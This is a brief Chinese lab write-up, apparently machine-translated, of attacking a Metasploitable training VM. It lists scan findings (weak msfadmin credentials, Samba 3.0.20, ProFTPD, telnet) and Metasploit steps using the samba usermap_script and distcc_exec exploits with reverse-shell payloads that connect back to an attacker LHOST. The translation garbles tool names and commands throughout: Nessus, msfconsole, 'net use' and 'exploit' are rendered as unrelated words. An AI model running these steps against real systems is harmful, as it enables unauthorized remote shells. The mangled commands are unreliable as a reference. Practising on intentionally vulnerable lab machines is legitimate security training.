漏洞测试确实是可以的& # 160;当时把文章复制下来进行再进行测试。但是没有复制到图片,实验是成功了,但是没有那么直观。
使用metasploit
对metasploitable靶服务器进行* * *
metasploitable是ubuntu8.0的版本
& # 160;
诺伊斯扫描到漏洞
139端口可以获取该系统主机名为“metasploitable”,注释“metasploitable服务器(Samba 3.0.20-Debian)”;
系统存在弱口令,用户用户,msfadmin密码与用户名一样,使用净使用命令能够建立连接查看共享资源.ftp开放版本信息ProFTPD 1.3.1服务器(Debian),用户这个用户在ftp中也可以使用;
telnet服务开放,可确定该系统为Ubuntu 8.04,用户用户,msfadmin可以登录,并获得相应权限。如果不存在弱口令,通过截获该telnet数据也能获取用户口令
一个distcc漏洞
一个Samba共享服务漏洞
& # 160;
& # 160;
无国界医生组织对靶服务器的工具
smb-samba共享服务
& # 160;
使用利用/多/Samba/usermap_script
设置载荷cmd/unix/反向
设置rhost (ip地址)
设置lhost (ip地址)
开发& # 160;
使用利用/unix/misc/distcc_exec
设置载荷cmd/unix/reverse_perl
设置rhost& # 160;(ip地址)
设置lhost& # 160;(ip地址)
开发& # 160;
distcc成功但是没有根的权限